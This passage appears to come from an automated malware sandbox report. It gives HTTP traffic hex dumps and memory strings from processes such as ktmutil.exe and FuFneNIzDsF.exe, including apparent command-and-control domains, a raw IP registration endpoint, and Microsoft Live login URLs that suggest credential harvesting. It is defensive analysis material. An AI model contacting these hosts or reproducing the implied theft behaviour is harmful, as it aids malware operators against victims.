f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 07:42:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 07:42:24 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 07:42:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Originset-cookie: locale=en-us; path=/; max-age=31557600; expires=Thu, 06 Nov 2025 13:42:52 GMTx-xss-protection: 1; mode=blockx-content-type-options: nosniffx-download-options: noopenstrict-transport-security: max-age=31536000; includeSubdomainsx-frame-options: SAMEORIGINcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ntPc25kEmC1ajuXatwuxMIq6piB7pNnnQ65qnRVu8s%2BGHY2NrPrkq7aSPYtKLT1tQ93dfg%2Fu8SmpG9zppjvFcsygWpBA6OxSDM7SArddCEF%2BbMRzij2I9JzTX60x%2FSxj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8de37305bc04e9bd-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1497&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=546&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 38 66 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 7a 68 2d 43 4e 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e e5 bd ac e5 b1 95 e5 b0 8f e8 af b4 e7 bd 91 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 Data Ascii: 18f6<!DOCTYPE html><html lang=zh-CN><head><meta charset=UTF-8><meta name=viewport content="width=device-width,initial-scale=1"><title></title><meta na
                Source: FuFneNIzDsF.exe, 00000008.00000002.4571453200.0000000005711000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.econsultoria.online
                Source: FuFneNIzDsF.exe, 00000008.00000002.4571453200.0000000005711000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.econsultoria.online/azb9/
                Source: FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000003FB0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.klohk.tech/3m3e/?SvrLY=3P8lALA&DDp=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000003D34000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000003644000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2740817749.0000000015A54000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://34.92.79.175:19817/register
                Source: ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://aiqb.top
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://anqb.top
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://aqqb.info
                Source: ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://chqb.info
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cpjqb.com
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dhqb.info
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dmqb.info
                Source: ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://egqb.top
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://erxs.top
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://esfqb.com
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Exo
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gdlqb.com
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gdxs.info
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gsxs.info
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gwqqb.com
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hgqb.xyz
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000003D34000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000003644000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2740817749.0000000015A54000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?a1c8cf8ce51343444e7823fb95efe38e
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://iwqb.top
                Source: ktmutil.exe, 00000006.00000002.4559793375.0000000002DDD000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.2630890430.0000000002DF1000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.2630890430.0000000002E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: ktmutil.exe, 00000006.00000002.4559793375.0000000002DDD000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.2630890430.0000000002DF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: ktmutil.exe, 00000006.00000003.2630056953.0000000007B0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: ktmutil.exe, 00000006.00000003.2630890430.0000000002DF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
                Source: ktmutil.exe, 00000006.00000003.2630890430.0000000002DF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf7&r
                Source: ktmutil.exe, 00000006.00000003.2630890430.0000000002DF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: ktmutil.exe, 00000006.00000003.2630890430.0000000002DF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=10335-2LMEM
                Source: ktmutil.exe, 00000006.00000002.4559793375.0000000002DDD000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.2630890430.0000000002DF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: ktmutil.exe, 00000006.00000003.2630890430.0000000002E06000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4559793375.0000000002E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: ktmutil.exe, 00000006.00000003.2630890430.0000000002E06000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4559793375.0000000002E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ltqb.info
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgnxs.com
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ncxs.xyz
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://nfqb.info
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://oejqb.com
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ozxs.top
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/css/parking2.css
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-desplegar.jpg
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-facebook-small.png
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-hosting.png
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-parking.png
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-ssl-parking.png
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-twitter-small.png
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-web-sencilla.png
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-web.png
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://plus.google.com/u/0/102310483732773374239
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://pmqb.xyz
